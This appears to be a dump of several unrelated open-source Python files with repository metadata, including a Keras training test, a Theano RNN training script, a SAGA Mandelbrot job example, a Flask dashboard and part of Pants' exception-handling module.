:param account_number: The account_number of this PaymentLine. # noqa: E501
:type: str
"""
self._account_number = account_number
@property
def sort_code(self):
"""Gets the sort_code of this PaymentLine. # noqa: E501
The account sort code # noqa: E501
:return: The sort_code of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._sort_code
@sort_code.setter
def sort_code(self, sort_code):
"""Sets the sort_code of this PaymentLine.
The account sort code # noqa: E501
:param sort_code: The sort_code of this PaymentLine. # noqa: E501
:type: str
"""
self._sort_code = sort_code
@property
def account_name(self):
"""Gets the account_name of this PaymentLine. # noqa: E501
The account name # noqa: E501
:return: The account_name of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._account_name
@account_name.setter
def account_name(self, account_name):
"""Sets the account_name of this PaymentLine.
The account name # noqa: E501
:param account_name: The account_name of this PaymentLine. # noqa: E501
:type: str
"""
self._account_name = account_name
| 26.544503 | 86 | 0.603748 |
4a1b32f0931896f64137bc057705a82a7d66afbe
| 14,395 |
py
|
Python
|
tensorflow/python/keras/engine/training_eager_test.py
|
EricRemmerswaal/tensorflow
|
141ff27877579c81a213fa113bd1b474c1749aca
|
[
"Apache-2.0"
] | 190,993 |
2015-11-09T13:17:30.000Z
|
2022-03-31T23:05:27.000Z
|
tensorflow/python/keras/engine/training_eager_test.py
|
EricRemmerswaal/tensorflow
|
141ff27877579c81a213fa113bd1b474c1749aca
|
[
"Apache-2.0"
] | 48,461 |
2015-11-09T14:21:11.000Z
|
2022-03-31T23:17:33.000Z
|
tensorflow/python/keras/engine/training_eager_test.py
|
EricRemmerswaal/tensorflow
|
141ff27877579c81a213fa113bd1b474c1749aca
|
[
"Apache-2.0"
] | 104,981 |
2015-11-09T13:40:17.000Z
|
2022-03-31T19:51:54.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training routines."""
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import metrics as metrics_module
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.optimizer_v2 import rmsprop
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
class TrainingTest(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_dynamic_model_has_trainable_weights(self):
if not context.executing_eagerly():
# Only test Eager modes, as Graph mode is not relevant for dynamic models.
return
class DynamicModel(keras.Model):
def __init__(self):
super(DynamicModel, self).__init__(dynamic=True)
self.dense = keras.layers.Dense(
1, kernel_initializer='zeros', bias_initializer='ones')
def call(self, inputs):
return self.dense(inputs)
model = DynamicModel()
model.compile(
'rmsprop', 'mae',
run_eagerly=True)
hist = model.fit(np.zeros((1, 1)), np.zeros((1, 1)))
self.assertEqual(hist.history['loss'][-1], 1)
self.assertEqual(len(model.trainable_weights), 2)
loss = model.train_on_batch(np.zeros((1, 1)), np.zeros((1, 1)))
# The loss must have been updated if the trainable weights are taken into
# account during tracking.
self.assertLess(loss, 1)
@keras_parameterized.run_with_all_model_types(exclude_models='sequential')
@keras_parameterized.run_all_keras_modes
def test_model_methods_with_eager_tensors_multi_io(self):
if not context.executing_eagerly():
# Only test V2 Function and V2 Eager modes, as V1 Graph mode with
# symbolic tensors has different requirements.
return
input_a = keras.layers.Input(shape=(3,), name='input_a')
input_b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
dropout = keras.layers.Dropout(0.5, name='dropout')
model = testing_utils.get_multi_io_model(
[input_a, dense], [input_b, dense, dropout])
optimizer = rmsprop.RMSprop(learning_rate=0.001)
loss = 'mse'
loss_weights = [1., 0.5]
metrics = ['mae', metrics_module.CategoricalAccuracy()]
model.compile(
optimizer,
loss,
metrics=metrics,
loss_weights=loss_weights,
run_eagerly=testing_utils.should_run_eagerly(),
sample_weight_mode=None)
input_a = array_ops.zeros(shape=(10, 3))
input_b = array_ops.zeros(shape=(10, 3))
target_a = array_ops.zeros(shape=(10, 4))
target_b = array_ops.zeros(shape=(10, 4))
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0)
# Test: no shuffle.
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0,
shuffle=False)
# Test: validation data.
model.fit([input_a, input_b], [target_a, target_b],
epochs=1, batch_size=2, verbose=0,
validation_data=([input_a, input_b], [target_a, target_b]))
model.train_on_batch([input_a, input_b], [target_a, target_b])
model.predict([input_a, input_b], batch_size=5)
model.evaluate([input_a, input_b], [target_a, target_b],
batch_size=2, verbose=0)
model.test_on_batch([input_a, input_b], [target_a, target_b])
# Test: mix np and tensors.
input_b = np.zeros(shape=(10, 3)).astype('float32')
target_b = np.zeros(shape=(10, 4)).astype('float32')
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0)
model.fit([input_a, input_b], [target_a, target_b],
epochs=1, batch_size=2, verbose=0,
validation_data=([input_a, input_b], [target_a, target_b]))
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0,
shuffle=False)
model.train_on_batch([input_a, input_b], [target_a, target_b])
model.predict([input_a, input_b], batch_size=5)
model.evaluate([input_a, input_b], [target_a, target_b],
batch_size=2, verbose=0)
model.test_on_batch([input_a, input_b], [target_a, target_b])
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_model_methods_with_eager_tensors_single_io(self):
if not context.executing_eagerly():
# Only test V2 Function and V2 Eager modes, as V1 Graph mode with
# symbolic tensors has different requirements.
return
model = testing_utils.get_small_mlp(10, 4, 3)
optimizer = rmsprop.RMSprop(learning_rate=0.001)
loss = 'mse'
metrics = ['mae', metrics_module.CategoricalAccuracy()]
model.compile(
optimizer,
loss,
metrics=metrics,
run_eagerly=testing_utils.should_run_eagerly())
inputs = array_ops.zeros(shape=(10, 3))
targets = array_ops.zeros(shape=(10, 4))
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=0)
model.fit(inputs, targets, epochs=1, batch_size=3, verbose=0, shuffle=False)
model.fit(inputs, targets, epochs=1, batch_size=4, verbose=0,
validation_data=(inputs, targets))
model.evaluate(inputs, targets, batch_size=2, verbose=0)
model.predict(inputs, batch_size=2)
model.train_on_batch(inputs, targets)
model.test_on_batch(inputs, targets)
@keras_parameterized.run_with_all_model_types
def test_model_fit_and_validation_with_missing_arg_errors(self):
model = testing_utils.get_small_mlp(10, 4, 3)
model.compile(optimizer=rmsprop.RMSprop(learning_rate=0.001),
loss='mse',
run_eagerly=True)
x = array_ops.zeros(shape=(10, 3))
y = array_ops.zeros(shape=(10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).repeat(10).batch(5)
validation_dataset = dataset_ops.Dataset.from_tensor_slices(
(x, y)).repeat().batch(5) # Infinite dataset.
model.fit(dataset, epochs=1, verbose=0)
# Step argument is required for infinite datasets.
with self.assertRaises(ValueError):
model.fit(dataset, steps_per_epoch=2, epochs=1, verbose=0,
validation_data=validation_dataset)
with self.assertRaises(ValueError):
model.fit(dataset, steps_per_epoch=2, epochs=1, verbose=0,
validation_data=validation_dataset)
# TODO(b/120931266): Enable test on subclassed models after bug causing an
# extra dimension to be added to predict outputs is fixed.
@keras_parameterized.run_with_all_model_types(exclude_models='subclass')
def test_generator_methods(self):
model = testing_utils.get_small_mlp(10, 4, 3)
optimizer = rmsprop.RMSprop(learning_rate=0.001)
model.compile(
optimizer,
loss='mse',
metrics=['mae', metrics_module.CategoricalAccuracy()],
run_eagerly=True)
x = np.random.random((10, 3))
y = np.random.random((10, 4))
def numpy_iterator():
while True:
yield x, y
model.fit_generator(numpy_iterator(), steps_per_epoch=3, epochs=1)
model.evaluate_generator(numpy_iterator(), steps=3)
def inference_numpy_iterator():
while True:
yield x
out = model.predict_generator(inference_numpy_iterator(), steps=3)
self.assertEqual(out.shape, (30, 4))
class CorrectnessTest(keras_parameterized.TestCase):
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
@parameterized.named_parameters([
('', dict()),
('_clipvalue_inf', {'clipvalue': 999999}),
('_clipnorm_inf', {'clipnorm': 999999}),
])
def test_loss_correctness(self, optimizer_kwargs):
# Test that training loss is the same in eager and graph
# (by comparing it to a reference value in a deterministic case)
layers = [
keras.layers.Dense(3, activation='relu',
kernel_initializer='ones'),
keras.layers.Dense(2, activation='softmax', kernel_initializer='ones')]
model = testing_utils.get_model_from_layers(layers, input_shape=(4,))
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=rmsprop.RMSprop(learning_rate=0.001, **optimizer_kwargs),
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones((100, 4))
np.random.seed(123)
y = np.random.randint(0, 1, size=(100, 1))
history = model.fit(x, y, epochs=1, batch_size=10)
self.assertAlmostEqual(history.history['loss'][-1], 0.5836, 4)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_loss_correctness_clipvalue_zero(self):
# Test that training loss is the same in eager and graph
# (by comparing it to a reference value in a deterministic case)
# And confirm that setting clipvalue to zero stops all training
layers = [
keras.layers.Dense(3, activation='relu',
kernel_initializer='ones'),
keras.layers.Dense(2, activation='softmax', kernel_initializer='ones')]
model = testing_utils.get_model_from_layers(layers, input_shape=(4,))
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=rmsprop.RMSprop(learning_rate=0.001, clipvalue=0.0),
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones((100, 4))
np.random.seed(123)
y = np.random.randint(0, 1, size=(100, 1))
history = model.fit(x, y, epochs=3, batch_size=10)
self.assertAlmostEqual(history.history['loss'][-3], 0.6931, 4)
self.assertAlmostEqual(history.history['loss'][-2], 0.6931, 4)
self.assertAlmostEqual(history.history['loss'][-1], 0.6931, 4)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_loss_correctness_with_iterator(self):
# Test that training loss is the same in eager and graph
# (by comparing it to a reference value in a deterministic case)
layers = [
keras.layers.Dense(3, activation='relu',
kernel_initializer='ones'),
keras.layers.Dense(2, activation='softmax', kernel_initializer='ones')]
model = testing_utils.get_model_from_layers(layers, input_shape=(4,))
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=rmsprop.RMSprop(learning_rate=0.001),
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones((100, 4), dtype=np.float32)
np.random.seed(123)
y = np.random.randint(0, 1, size=(100, 1))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
history = model.fit(dataset, epochs=1, steps_per_epoch=10)
self.assertAlmostEqual(history.history['loss'][-1], 0.5836, 4)
@parameterized.named_parameters([
('_None', None, 0., 4.),
('_False', False, 4., 4.),
('_True', True, 0., 0.),
])
def test_nested_model_learning_phase(self, training,
expected_training_loss,
expected_validation_loss):
"""Tests that learning phase is correctly set in an intermediate layer."""
def _make_unregularized_model():
inputs = keras.Input((4,))
# Zero out activations when `training=True`.
x = keras.layers.Dropout(1. - 1. / (1 << 24))(inputs)
x = keras.layers.Dense(
10,
activation='relu',
trainable=False,
bias_initializer='zeros',
kernel_initializer='ones')(
x) # Just sum together all the activations.
outputs = keras.layers.Dense(3)(x)
return keras.Model(inputs, outputs)
def _regularize_model(unregularized_model):
# Regularize the most recent activations of a post-dropout layer.
sample_activations = unregularized_model.get_layer(
index=-2).get_output_at(-1)
regularization_loss = keras.backend.mean(sample_activations)
unregularized_model.add_loss(regularization_loss)
unregularized_model.add_metric(
regularization_loss, aggregation='mean', name='regularization_loss')
inputs = keras.Input(unregularized_model.inputs[0].shape[1:])
logits = unregularized_model(inputs, training=training)
outputs = keras.activations.softmax(logits)
model = keras.Model(inputs, outputs)
return model
# Make and compile models.
model = _regularize_model(_make_unregularized_model())
model.compile('sgd', 'sparse_categorical_crossentropy')
# Prepare fake data.
x = np.ones((20, 4)).astype(np.float32)
y = np.random.randint(0, 3, size=(20,)).astype(np.int64)
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(2)
results = model.evaluate(dataset)
evaluation_results = dict(zip(model.metrics_names, results))
# Rate of dropout depends on the learning phase.
self.assertEqual(evaluation_results['regularization_loss'],
expected_validation_loss)
history = model.fit(dataset, epochs=2, validation_data=dataset).history
self.assertAllEqual(history['regularization_loss'],
[expected_training_loss] * 2)
self.assertAllEqual(history['val_regularization_loss'],
[expected_validation_loss] * 2)
if __name__ == '__main__':
ops.enable_eager_execution()
test.main()
| 40.209497 | 80 | 0.680861 |
4a1b332d1428bccf5fecf87d652dc2f443427f18
| 3,965 |
py
|
Python
|
train-theano.py
|
tim-pl-m/rnn-tutorial-rnnlm
|
6af6c8fe6a44c91a2eb73573b3f0a042b29614a6
|
[
"Apache-2.0"
] | 32 |
2017-10-30T01:44:56.000Z
|
2021-12-23T06:40:47.000Z
|
train-theano.py
|
tim-pl-m/rnn-tutorial-rnnlm
|
6af6c8fe6a44c91a2eb73573b3f0a042b29614a6
|
[
"Apache-2.0"
] | 1 |
2020-11-18T21:13:24.000Z
|
2020-11-18T21:13:24.000Z
|
train-theano.py
|
tim-pl-m/rnn-tutorial-rnnlm
|
6af6c8fe6a44c91a2eb73573b3f0a042b29614a6
|
[
"Apache-2.0"
] | 19 |
2017-12-15T13:27:36.000Z
|
2020-08-18T00:16:38.000Z
|
#! /usr/bin/env python
import csv
import itertools
import operator
import numpy as np
import nltk
import sys
import os
import time
from datetime import datetime
from utils import *
from rnn_theano import RNNTheano
nltk.download("book")
_VOCABULARY_SIZE = int(os.environ.get('VOCABULARY_SIZE', '8000'))
_HIDDEN_DIM = int(os.environ.get('HIDDEN_DIM', '80'))
_LEARNING_RATE = float(os.environ.get('LEARNING_RATE', '0.005'))
_NEPOCH = int(os.environ.get('NEPOCH', '100'))
_MODEL_FILE = os.environ.get('MODEL_FILE')
def train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=1, evaluate_loss_after=5):
# We keep track of the losses so we can plot them later
losses = []
num_examples_seen = 0
for epoch in range(nepoch):
# Optionally evaluate the loss
if (epoch % evaluate_loss_after == 0):
loss = model.calculate_loss(X_train, y_train)
losses.append((num_examples_seen, loss))
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
print "%s: Loss after num_examples_seen=%d epoch=%d: %f" % (time, num_examples_seen, epoch, loss)
# Adjust the learning rate if loss increases
if (len(losses) > 1 and losses[-1][1] > losses[-2][1]):
learning_rate = learning_rate * 0.5
print "Setting learning rate to %f" % learning_rate
sys.stdout.flush()
# ADDED! Saving model oarameters
save_model_parameters_theano("./data/rnn-theano-%d-%d-%s.npz" % (model.hidden_dim, model.word_dim, time), model)
# For each training example...
for i in range(len(y_train)):
# One SGD step
model.sgd_step(X_train[i], y_train[i], learning_rate)
num_examples_seen += 1
vocabulary_size = _VOCABULARY_SIZE
unknown_token = "UNKNOWN_TOKEN"
sentence_start_token = "SENTENCE_START"
sentence_end_token = "SENTENCE_END"
# Read the data and append SENTENCE_START and SENTENCE_END tokens
print "Reading CSV file..."
with open('data/reddit-comments-2015-08.csv', 'rb') as f:
reader = csv.reader(f, skipinitialspace=True)
reader.next()
# Split full comments into sentences
sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])
# Append SENTENCE_START and SENTENCE_END
sentences = ["%s %s %s" % (sentence_start_token, x, sentence_end_token) for x in sentences]
print "Parsed %d sentences." % (len(sentences))
# Tokenize the sentences into words
tokenized_sentences = [nltk.word_tokenize(sent) for sent in sentences]
# Count the word frequencies
word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))
print "Found %d unique words tokens." % len(word_freq.items())
# Get the most common words and build index_to_word and word_to_index vectors
vocab = word_freq.most_common(vocabulary_size-1)
index_to_word = [x[0] for x in vocab]
index_to_word.append(unknown_token)
word_to_index = dict([(w,i) for i,w in enumerate(index_to_word)])
print "Using vocabulary size %d." % vocabulary_size
print "The least frequent word in our vocabulary is '%s' and appeared %d times." % (vocab[-1][0], vocab[-1][1])
# Replace all words not in our vocabulary with the unknown token
for i, sent in enumerate(tokenized_sentences):
tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sent]
# Create the training data
X_train = np.asarray([[word_to_index[w] for w in sent[:-1]] for sent in tokenized_sentences])
y_train = np.asarray([[word_to_index[w] for w in sent[1:]] for sent in tokenized_sentences])
model = RNNTheano(vocabulary_size, hidden_dim=_HIDDEN_DIM)
t1 = time.time()
model.sgd_step(X_train[10], y_train[10], _LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
if _MODEL_FILE != None:
load_model_parameters_theano(_MODEL_FILE, model)
train_with_sgd(model, X_train, y_train, nepoch=_NEPOCH, learning_rate=_LEARNING_RATE)
| 40.459184 | 124 | 0.706431 |
4a1b333e9ba5e6032c1f6e0ed1d6d3f11b07de48
| 3,953 |
py
|
Python
|
examples/tutorial/mandelbrot/saga_mandelbrot_osg.py
|
yutiansut/radical.saga
|
6b80c39223a04a4b240942dc1bd7834c9caffecd
|
[
"MIT"
] | null | null | null |
examples/tutorial/mandelbrot/saga_mandelbrot_osg.py
|
yutiansut/radical.saga
|
6b80c39223a04a4b240942dc1bd7834c9caffecd
|
[
"MIT"
] | null | null | null |
examples/tutorial/mandelbrot/saga_mandelbrot_osg.py
|
yutiansut/radical.saga
|
6b80c39223a04a4b240942dc1bd7834c9caffecd
|
[
"MIT"
] | null | null | null |
__author__ = "Ole Weidner"
__copyright__ = "Copyright 2012-2013, The SAGA Project"
__license__ = "MIT"
import sys
import time
from PIL import Image
import radica.saga as rs
REMOTE_JOB_ENDPOINT = "condor://localhost"
# the dimension (in pixel) of the whole fractal
IMGX = 2048
IMGY = 2048
# the number of tiles in X and Y direction
TILESX = 2
TILESY = 2
if __name__ == "__main__":
try:
# list that holds the jobs
jobs = []
jobservice = rs.job.Service(REMOTE_JOB_ENDPOINT)
for x in range(0, TILESX):
for y in range(0, TILESY):
# describe a single Mandelbrot job. we're using the
# directory created above as the job's working directory
outputfile = 'tile_x%s_y%s.gif' % (x, y)
jd = rs.job.Description()
# candidate hosts can be changed / and or commented out
# the list below seems to be a good working set for OSG
#jd.candidate_hosts = ["FNAL_FERMIGRID", "cinvestav", "SPRACE",
# "NYSGRID_CORNELL_NYS1", "Purdue-Steele",
# "MIT_CMS_CE2", "SWT2_CPB", "AGLT2_CE_2",
# "UTA_SWT2", "GridUNESP_CENTRAL",
# "USCMS-FNAL-WC1-CE3"]
# on OSG we need to stage in the data with the jobs. we
# can't use the saga filesystem API to copy data around since
# the execution location of the jobs is not known a priori
jd.file_transfer = ["mandelbrot.sh > mandelbrot.sh",
"mandelbrot.py > mandelbrot.py",
"%s < %s" % (outputfile, outputfile)]
jd.wall_time_limit = 10
jd.total_cpu_count = 1
jd.executable = '/bin/sh'
jd.arguments = ['mandelbrot.sh', IMGX, IMGY,
(IMGX/TILESX*x), (IMGX/TILESX*(x+1)),
(IMGY/TILESY*y), (IMGY/TILESY*(y+1)),
outputfile]
# create the job from the description
# above, launch it and add it to the list of jobs
job = jobservice.create_job(jd)
job.run()
jobs.append(job)
print ' * Submitted %s. Output will be written to: %s' % (job.id, outputfile)
# wait for all jobs to finish
while len(jobs) > 0:
for job in jobs:
jobstate = job.get_state()
print ' * Job %s status: %s' % (job.id, jobstate)
if jobstate in [rs.job.DONE, rs.job.FAILED]:
jobs.remove(job)
time.sleep(5)
# stitch together the final image
fullimage = Image.new('RGB', (IMGX, IMGY), (255, 255, 255))
print ' * Stitching together the whole fractal: mandelbrot_full.gif'
for x in range(0, TILESX):
for y in range(0, TILESY):
partimage = Image.open('tile_x%s_y%s.gif' % (x, y))
fullimage.paste(partimage,
(IMGX/TILESX*x, IMGY/TILESY*y,
IMGX/TILESX*(x+1), IMGY/TILESY*(y+1)))
fullimage.save("mandelbrot_full.gif", "GIF")
sys.exit(0)
except rs.SagaException, ex:
# Catch all saga exceptions
print "An exception occured: (%s) %s " % (ex.type, (str(ex)))
# Trace back the exception. That can be helpful for debugging.
print " \n*** Backtrace:\n %s" % ex.traceback
sys.exit(-1)
except KeyboardInterrupt:
# ctrl-c caught: try to cancel our jobs before we exit
# the program, otherwise we'll end up with lingering jobs.
for job in jobs:
job.cancel()
sys.exit(-1)
| 39.53 | 93 | 0.512522 |
4a1b337e5ec72b38663df852fe545150a1a43392
| 83 |
py
|
Python
|
tonks/vision/models/__init__.py
|
vanderveld/tonks
|
e87afbd9614b276b443b4a7527fd1fda01a8be4c
|
[
"BSD-3-Clause"
] | null | null | null |
tonks/vision/models/__init__.py
|
vanderveld/tonks
|
e87afbd9614b276b443b4a7527fd1fda01a8be4c
|
[
"BSD-3-Clause"
] | null | null | null |
tonks/vision/models/__init__.py
|
vanderveld/tonks
|
e87afbd9614b276b443b4a7527fd1fda01a8be4c
|
[
"BSD-3-Clause"
] | null | null | null |
from tonks.vision.models.multi_task_resnet import ResnetForMultiTaskClassification
| 41.5 | 82 | 0.915663 |
4a1b3458add597300d1c6d4a95125d3cfe559539
| 835 |
py
|
Python
|
parts/cluster_key_long/cluster_key_long.py
|
rutgervana/lalboard
|
4e3174a545aaef074abca677f9573e4fc0cdbc51
|
[
"Apache-2.0"
] | 622 |
2019-02-14T23:56:28.000Z
|
2022-03-29T18:50:25.000Z
|
parts/cluster_key_long/cluster_key_long.py
|
rutgervana/lalboard
|
4e3174a545aaef074abca677f9573e4fc0cdbc51
|
[
"Apache-2.0"
] | 13 |
2019-07-31T17:20:41.000Z
|
2022-01-19T12:55:25.000Z
|
parts/cluster_key_long/cluster_key_long.py
|
rutgervana/lalboard
|
4e3174a545aaef074abca677f9573e4fc0cdbc51
|
[
"Apache-2.0"
] | 41 |
2019-04-23T13:05:47.000Z
|
2022-01-28T15:03:10.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import adsk.core
from fscad import *
relative_import("../../lalboard.py")
from lalboard import long_side_key
def design():
long_side_key().create_occurrence(scale=.1)
def run(_):
run_design(design, message_box_on_error=False, document_name=__name__)
| 29.821429 | 74 | 0.764072 |
4a1b351ca6fd08f5b774d0edd4d6b8c9f8fdca47
| 3,294 |
py
|
Python
|
Main/route.py
|
SmartBinTUC2016/SmartBin-TUC2016
|
2ed093dbe29b4aa0ba7b46fa1d945acc9aa476c1
|
[
"PSF-2.0",
"BSD-3-Clause",
"MIT"
] | null | null | null |
Main/route.py
|
SmartBinTUC2016/SmartBin-TUC2016
|
2ed093dbe29b4aa0ba7b46fa1d945acc9aa476c1
|
[
"PSF-2.0",
"BSD-3-Clause",
"MIT"
] | null | null | null |
Main/route.py
|
SmartBinTUC2016/SmartBin-TUC2016
|
2ed093dbe29b4aa0ba7b46fa1d945acc9aa476c1
|
[
"PSF-2.0",
"BSD-3-Clause",
"MIT"
] | null | null | null |
#########################################################################
# The MIT License (MIT) #
# Copyright (c) 2016 Patrick Lai, Josh Manogaran, #
# Brendan Srinivasalu, Elias Tadros #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be #
# included in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, #
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF #
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.#
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY #
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF #
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION #
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
#########################################################################
# Library from Armin Ronacher
from flask import *
# Own modules
import database
import comms
import random
# Standard Libraries from Python Software Foundation
import json
import urllib2
# Initialise Flask App
app = Flask(__name__)
app.secret_key = 'hello'
# Declare global variables
page = {}
session = {}
'''
Index Page
'''
@app.route('/')
def index():
page['title'] = 'Overview'
page['bins'] = '1'
num_users = database.get_num_users()
return render_template('index.html', page = page, num_users = num_users)
'''
Capacity Page
'''
@app.route('/capacity', methods=['GET','POST'])
def get_capacity():
res = comms.get_data() # Retrieve data
page['title'] = 'Capacity'
# Data assignment to page variables
if res['level'] != '?': # Check whether there was data received
page['capacity'] = (res['weight']/1000 + res['level'])/2 # Calculate total current capacity
else:
page['capacity'] = '?'
page['level'] = res['level']
page['user'] = res['user']
page['weight'] = res['weight']
# Capacity Checking
if page['capacity'] == '?':
page['status'] = 'Connection error'
elif page['capacity'] < 90:
page['status'] = 'OK'
elif page['capacity'] >= 90:
page['status'] = 'FULL'
return render_template('capacity.html', page = page)
'''
Users Page
'''
@app.route('/users')
def get_users():
page['title'] = 'Users'
users = database.get_users()
return render_template('users.html', page = page, users = users)
| 37.431818 | 99 | 0.565574 |
4a1b35df2c99bf468cb029d94723f6c857ac939e
| 439 |
py
|
Python
|
tests/acceptance/steps/interactions.py
|
GrantHynd/hamiltontimeline
|
e5a11c5baa80523123b6d16d5cb4e52846b847db
|
[
"MIT"
] | null | null | null |
tests/acceptance/steps/interactions.py
|
GrantHynd/hamiltontimeline
|
e5a11c5baa80523123b6d16d5cb4e52846b847db
|
[
"MIT"
] | null | null | null |
tests/acceptance/steps/interactions.py
|
GrantHynd/hamiltontimeline
|
e5a11c5baa80523123b6d16d5cb4e52846b847db
|
[
"MIT"
] | null | null | null |
from behave import *
from tests.acceptance.page_model.create_event_page import CreateEventPage
use_step_matcher('re')
@when('I enter "(.*)" in the "(.*)" field')
def step_impl(context, content, field_name):
page = CreateEventPage(context.driver)
page.form_field(field_name).send_keys(content)
@when('I press the submit button')
def step_impl(context):
page = CreateEventPage(context.driver)
page.submit_button.click()
| 25.823529 | 73 | 0.744875 |
4a1b37d6a2f20660b860c4de77bf3ce5a5eaa741
| 22,047 |
py
|
Python
|
src/python/pants/base/exception_sink.py
|
pierrechevalier83/pants
|
57500373dbc1ea6edf5e023197f0e71291537f09
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/base/exception_sink.py
|
pierrechevalier83/pants
|
57500373dbc1ea6edf5e023197f0e71291537f09
|
[
"Apache-2.0"
] | 1 |
2019-07-29T16:58:21.000Z
|
2019-07-29T16:58:21.000Z
|
src/python/pants/base/exception_sink.py
|
pierrechevalier83/pants
|
57500373dbc1ea6edf5e023197f0e71291537f09
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import datetime
import faulthandler
import logging
import os
import signal
import sys
import threading
import traceback
from contextlib import contextmanager
from typing import Callable
import setproctitle
from pants.base.exiter import Exiter
from pants.util.dirutil import safe_mkdir, safe_open
from pants.util.osutil import Pid
logger = logging.getLogger(__name__)
class SignalHandler:
"""A specification for how to handle a fixed set of nonfatal signals.
This is subclassed and registered with ExceptionSink.reset_signal_handler() whenever the signal
handling behavior is modified for different pants processes, for example in the remote client when
pantsd is enabled. The default behavior is to exit "gracefully" by leaving a detailed log of which
signal was received, then exiting with failure.
Note that the terminal will convert a ctrl-c from the user into a SIGINT.
"""
@property
def signal_handler_mapping(self):
"""A dict mapping (signal number) -> (a method handling the signal)."""
# Could use an enum here, but we never end up doing any matching on the specific signal value,
# instead just iterating over the registered signals to set handlers, so a dict is probably
# better.
return {
signal.SIGINT: self._handle_sigint_if_enabled,
signal.SIGQUIT: self.handle_sigquit,
signal.SIGTERM: self.handle_sigterm,
}
def __init__(self):
self._ignore_sigint_lock = threading.Lock()
self._threads_ignoring_sigint = 0
def _check_sigint_gate_is_correct(self):
assert self._threads_ignoring_sigint >= 0, \
"This should never happen, someone must have modified the counter outside of SignalHandler."
def _handle_sigint_if_enabled(self, signum, _frame):
with self._ignore_sigint_lock:
self._check_sigint_gate_is_correct()
threads_ignoring_sigint = self._threads_ignoring_sigint
if threads_ignoring_sigint == 0:
self.handle_sigint(signum, _frame)
@contextmanager
def _ignoring_sigint(self):
with self._ignore_sigint_lock:
self._check_sigint_gate_is_correct()
self._threads_ignoring_sigint += 1
try:
yield
finally:
with self._ignore_sigint_lock:
self._threads_ignoring_sigint -= 1
self._check_sigint_gate_is_correct()
def handle_sigint(self, signum, _frame):
raise KeyboardInterrupt('User interrupted execution with control-c!')
# TODO(#7406): figure out how to let sys.exit work in a signal handler instead of having to raise
# this exception!
class SignalHandledNonLocalExit(Exception):
"""Raised in handlers for non-fatal signals to overcome Python limitations.
